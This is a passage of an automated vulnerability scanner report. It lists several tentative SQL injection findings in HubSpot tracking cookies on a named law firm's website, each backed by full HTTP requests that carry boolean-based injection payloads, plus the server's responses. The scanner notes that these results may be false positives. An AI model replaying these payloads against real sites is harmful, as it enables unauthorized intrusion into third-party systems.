<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.93. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotdt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 13645990'%20or%201%3d1--%20 and 13645990'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4113645990'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 16:10:57 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4113645990'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.94. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotutk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 74646296'%20or%201%3d1--%20 and 74646296'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee574646296'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 16:11:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee574646296'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.95. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 73864364'%20or%201%3d1--%20 and 73864364'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee573864364'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 16:11:09 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee573864364'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.96. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 16119179'%20or%201%3d1--%20 and 16119179'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee516119179'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 16:11:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee516119179'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.97. http://www.pillsburylaw.com/scripts/images/arrows-default.png [hubspotvw cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 15646355'%20or%201%3d1--%20 and 15646355'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515646355'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 16:11:16 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515646355'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
